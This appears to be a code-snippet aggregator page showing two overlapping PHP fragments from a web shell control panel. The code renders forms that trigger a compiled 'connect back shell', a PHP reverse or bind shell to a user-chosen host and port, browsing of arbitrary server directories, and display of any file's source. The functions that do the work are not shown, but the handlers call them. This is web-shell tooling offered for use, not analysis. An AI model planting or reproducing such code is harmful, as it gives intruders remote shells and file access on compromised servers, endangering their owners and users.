Ejemplo n.º 1
0
# connect C back shell handling
###############################################################################
if ($connectback == 1) {
    $strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>\n\t<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>\n\t<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>\n\t<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>\n\t<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>";
    if ($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) {
        $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
    }
    $strOutput .= "</td></tr></form></table>";
}
###############################################################################
# PHP shell handling
###############################################################################
if ($phpshell == 1) {
    $strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>\n\t<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>\n\t<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>\n\t<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>\n\t<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>";
    if ($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) {
        $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
    }
    $strOutput .= "</td></tr></form></table>";
}
###############################################################################
# snooping
###############################################################################
if ($snoop == 1) {
    $strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>\n\t<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>\n\t</form>\n\t</table>";
}
###############################################################################
# show highlited source
###############################################################################
if ($showsource == 1 | $vsource != $ArrDefaults['vsource']) {
    $strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>\n\t<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>\n\t<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>\n\t<tr><td></td><td><input type=submit></td></tr>\n\t<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>\n\t</form>\n\t</table>";
}
Ejemplo n.º 2
0
}

###############################################################################
# PHP shell handling
###############################################################################
if($phpshell == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
	<tr><td></td><td><input type=submit></td></tr>
	<tr><td colspan=2>";
	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
	$strOutput .= "</td></tr></form></table>";
}


###############################################################################
# snooping
###############################################################################
if($snoop == 1) {
	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
	</form>
	</table>";
}